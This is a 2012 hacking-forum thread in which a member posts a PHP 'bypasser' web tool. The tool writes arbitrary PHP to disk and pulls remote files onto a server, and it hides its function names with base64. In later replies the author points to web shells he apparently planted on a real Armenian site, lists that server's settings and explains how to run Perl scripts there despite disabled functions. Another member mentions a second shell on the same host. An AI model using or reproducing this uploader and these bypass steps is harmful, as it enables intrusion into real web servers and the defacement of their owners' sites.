Anti-armenia.ORG - Forumlar - Simple Bypasser !

Forumlar / Hacking Platform / Hacking & Security Tools / Simple Bypasser !

Istifadəçi

2012-11-22 00:54 GMT

Dr.KroOoZ

C0d3r

Mesaj Sayı : 127

Mövzu Sayı :

Rep Ver :

Rep Sayı : 11

Indi Saytda : Durum

Cinsiyyət :

Şəhər :

Ölkə :

Məslək : Dr.KroOoZ

Yaş :

Mesaj :

Hello

here tool : http://pastebin.com/AQfaE07q

Kod:
<form method="POST">
<center>
<title> Simple Bypasser </title>
[+] Simple
Bypasser !
Create Folder : 
<input type="text" name="dir" value="sec4ever">
<input type="submit" value="Create" name="folder"> 
Get File : 
<input type="text" name="get" value="url file .txt">
<input type="text" name="name" value="sec4ever.php">
<input type="text" name="select" value="<? echo dirname(__FILE__); ?>">
<input type="submit" value="GET" name="fileget"> 
Fopen File : 
<input type="text" name="save" value="krz.php">
<input type="text" name="path2" value="<? echo dirname(__FILE__); ?>"> 
<textarea name="source" cols="45" rows="5">PHP Code</textarea>
<input type="submit" value="Save" name="fopen">
<?
#########################################################################
# Coded By : Dr.KroOoZ #
# E-mail : b0x@hotmail.com #
# Homepage : www.sec4ever.com #
# GreetsTo : b0x - H.K - N.K - Asmar - No-QRQR - n4ss1m - DR.THMOORY #
#########################################################################
# Create Folder
if($_POST['folder']) {
$mk = $_POST['dir'];
$func = "bWtkaXI=";
$de = base64_decode($func);
$rules1 = $de($mk);
if ($mk) {
echo " [+] Done [ $mk ] Created !";
} }
# File Get Contents
if($_POST['fileget']) {
$get = $_POST['get'];
$n4m = $_POST['name'];
$path = $_POST['select'];
$func2 = "ZmlsZV9nZXRfY29udGVudHM=";
$de2 = base64_decode($func2);
$rules2 = $de2($get);
$open = fopen("$path/$n4m", 'w');
fwrite($open,$rules2);
fclose($open);
if($get) {
echo "done";
} }
#
# fopen File
if($_POST['fopen']) {
$save = $_POST['save'];
$path2 = $_POST['path2'];
$open2 = fopen("$path2/$save", 'w');
$source1 = $_POST['source'];
$source2 = stripslashes($source1);
fwrite($open2 ,$source2);
fclose($open2);
if($open2) {
echo "done";
} }
?>
 
# Coded By : Dr.KroOoZ # 
# E-mail : 
<a href="mailto:b0x@hotmail.com" style="text-decoration: none">
b0x@hotmail.com</a> # 
# Homepage : <a href="http://www.sec4ever.com" style="text-decoration: none">
www.sec4ever.com</a>  # 
# GreetsTo : b0x - N.K
- Asmar - No-QRQR -
n4ss1m -
DR.THMOORY # 
Note : 
This Tool Is Using
file_get_contents & fOpen Functions !

Anti-armenia.ORG

Istifadəçi

2012-11-22 16:55 GMT

Ferid23

Admin

Mesaj Sayı : 1875

Mövzu Sayı :

Rep Ver :

Rep Sayı : 45

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : Anti-armenia.ORG

Ölkə :

Məslək : Programmer & Defacer

Yaş : 12

Mesaj :

Thanks

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)

Anti-armenia.ORG

Istifadəçi

2012-11-22 23:54 GMT

BlackMinD

Pr0grammer

Mesaj Sayı : 1677

Mövzu Sayı :

Rep Ver :

Rep Sayı : 62

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : KARABAKH IS AZERBAIJAN!

Ölkə :

Məslək :

Yaş :

Mesaj :

Dude why you're using base64'ed file_get_contents?))
I don't want to hurt you again but it is stupid thing and it'll suck against simple "protection" like open_basedir.

Same things applies also to other functions which you're using:
file_get_contents(),mkdir(),fopen() <=*All this functions is affected by open_basedir restriction.*
If you really think it is bypasser then here is my question: Bypasses What?Which conditions?

Ana VƏTƏN!

Anti-armenia.ORG

Istifadəçi

2012-11-23 14:13 GMT

Dr.KroOoZ

C0d3r

Mesaj Sayı : 127

Mövzu Sayı :

Rep Ver :

Rep Sayı : 11

Indi Saytda : Durum

Cinsiyyət :

Şəhər :

Ölkə :

Məslək : Dr.KroOoZ

Yaş :

Mesaj :

^
ok download code tool then come hurt me
before i download my tools i use and i give to people test then i download
and this work ok ! (:

Anti-armenia.ORG

Istifadəçi

2012-11-23 15:17 GMT

BlackMinD

Pr0grammer

Mesaj Sayı : 1677

Mövzu Sayı :

Rep Ver :

Rep Sayı : 62

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : KARABAKH IS AZERBAIJAN!

Ölkə :

Məslək :

Yaş :

Mesaj :

Really?
Expect that peoples who downloads any script from WWW i always read scripts to understand how it works.

Here is some chance for you then:

http://www.sgp.am//readmes.php

SHow me how you can bypass restrictions via using *your tool*.
And if possible record video.

And here is some demo for you: (This time in Windows XP Apache + php 5.2.17 + safe_mode =off,GPC=off)
"protection" is only open_basedir.
(In my computer)

Current script in: C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\blin.php
I want to "bypass" and create some php file (in C:\Program Files\Apache Software Foundation\Apache2.2 ) using your tool.
Still sucks.(
Notice: open_basedir restriction in effect.

Kod:
Notice: Undefined index: folder in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\blin.php on line 27

Notice: Undefined index: fileget in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\blin.php on line 36

Warning: fopen() [function.fopen]: open_basedir restriction in effect. File(C:/Program Files/Apache Software Foundation/Apache2.2//krz.php) is not within the allowed path(s): (C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn;C:\DOCUME~1\Apache\LOCALS~1\Temp) in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\blin.php on line 54

Warning: fopen(C:/Program Files/Apache Software Foundation/Apache2.2//krz.php) [function.fopen]: failed to open stream: Operation not permitted in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\blin.php on line 54

Warning: fwrite(): supplied argument is not a valid stream resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\blin.php on line 57

Warning: fclose(): supplied argument is not a valid stream resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\blin.php on line 58

Using Get file (in your tool)

This time i want to read httpd.conf file.(Still sucks)

Kod:
Notice: Undefined index: folder in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\blin.php on line 27

Warning: file_get_contents(httpd.conf) [function.file-get-contents]: failed to open stream: No such file or directory in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\blin.php on line 42

Warning: fopen() [function.fopen]: open_basedir restriction in effect. File(C:/Program Files/Apache Software Foundation/Apache2.2/conf//httpd.conf) is not within the allowed path(s): (C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn;C:\DOCUME~1\Apache\LOCALS~1\Temp) in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\blin.php on line 43

Warning: fopen(C:/Program Files/Apache Software Foundation/Apache2.2/conf//httpd.conf) [function.fopen]: failed to open stream: Operation not permitted in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\blin.php on line 43

Warning: fclose(): supplied argument is not a valid stream resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\blin.php on line 45
done
Notice: Undefined index: fopen in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\blin.php on line 51

And finally your "mkdir" method.

Kod:
Warning: mkdir() [function.mkdir]: open_basedir restriction in effect. File(C:/Program Files/Apache Software Foundation/Apache2.2/sikdir) is not within the allowed path(s): (C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn;C:\DOCUME~1\Apache\LOCALS~1\Temp) in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\blin.php on line 31

[+] Done [ C:/Program Files/Apache Software Foundation/Apache2.2/sikdir ] Created !
Notice: Undefined index: fileget in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\blin.php on line 36

Notice: Undefined index: fopen in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\blin.php on line 51

So as you can see it obviously sucks?
Also you don't answered to my question: *Which restriction your tool must Bypass?*

Ağıllı çıxıb da bu indi)

Ana VƏTƏN!

Anti-armenia.ORG

Istifadəçi

2012-11-23 16:28 GMT

Dr.KroOoZ

C0d3r

Mesaj Sayı : 127

Mövzu Sayı :

Rep Ver :

Rep Sayı : 11

Indi Saytda : Durum

Cinsiyyət :

Şəhər :

Ölkə :

Məslək : Dr.KroOoZ

Yaş :

Mesaj :

^ Use In linux server
Not Windows Private Server

http://www.sgp.am/sec4ever/ | Create Complate
http://www.sgp.am/az/pp.php | Here Shell

And

Kod:
Safe_Mode: OFF Open_Basedir: NONE Safe_Exec_Dir: /usr/local/php/bin Safe_Gid: OFF Safe_Include_Dir: NONE Sql.safe_mode: OFF
Disable Functions : NONE
Free Space : 2.93 GB Total Space: 24.77 GB
Useful: gcc, cc, ld, php, perl, python, make, tar, gzip, bzip2, locate
Dangerous: chkrootkit
Downloaders: fopen, wget, lynx, curl

++
Encrypt Function Its Bypass Same Trick To Bypass SuPHP
And Fopen u Can Used in Server Normally

Kod:
Safe_mode = ON
Disable functions : dl,escapeshellarg,escapeshellcmd,exec,passthru,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,system,pcntl_exec,getrusage,chown,chgrp,closelog,openlog,syslog,define_syslog_variables,php_ini_scanned_files,php_ini_loaded_file,ini_get_all,get_cfg_var,getservbyname,getservbyport
Downloaders: fopen

We See In Disable_function = file_get_contents // Now its Not work ..
Now We Can Bypass Using fopen
How To Bypass
put Source Perl in tool & htaccess ..

Then put This PHP Code
Name : chmod.php

Kod:
<?
chmod("anti-armenia.pl", 0755);
?>

And Open chmod.php Will Be Chmod
Then U Bypass Server ..

Download : http://prdownloads.sourceforge.net/appserv/appserv-win32-2.5.10.exe?download
This Private Server Is Better :P

Anti-armenia.ORG

Istifadəçi

2012-11-23 17:02 GMT

BlackMinD

Pr0grammer

Mesaj Sayı : 1677

Mövzu Sayı :

Rep Ver :

Rep Sayı : 62

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : KARABAKH IS AZERBAIJAN!

Ölkə :

Məslək :

Yaş :

Mesaj :

Thanks dude for php.ini thing.I know about it but encrypting functions via base64_encode() it is a bit new thing for me)
ALso i know about code excution via perl(cgi telnet)+ Perl symlink()) This is a another story btw.
But can your http://pastebin.com/AQfaE07q script may bypass that server?(My original question about this)
I don't want perl stuff.

Thanks a lot.

Ana VƏTƏN!

Anti-armenia.ORG

Istifadəçi

2012-11-23 17:17 GMT

Dr.KroOoZ

C0d3r

Mesaj Sayı : 127

Mövzu Sayı :

Rep Ver :

Rep Sayı : 11

Indi Saytda : Durum

Cinsiyyət :

Şəhər :

Ölkə :

Məslək : Dr.KroOoZ

Yaş :

Mesaj :

i bypass server i got file using file_get_contents :P

Anti-armenia.ORG

Istifadəçi

2012-11-23 17:21 GMT

BlackMinD

Pr0grammer

Mesaj Sayı : 1677

Mövzu Sayı :

Rep Ver :

Rep Sayı : 62

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : KARABAKH IS AZERBAIJAN!

Ölkə :

Məslək :

Yaş :

Mesaj :

LoL My apogolises then dude.
BTW,It seems someone romoved whole public_html from there.
I have another shell there and i'm going pm it to you.
Check pm please.

Ana VƏTƏN!

Anti-armenia.ORG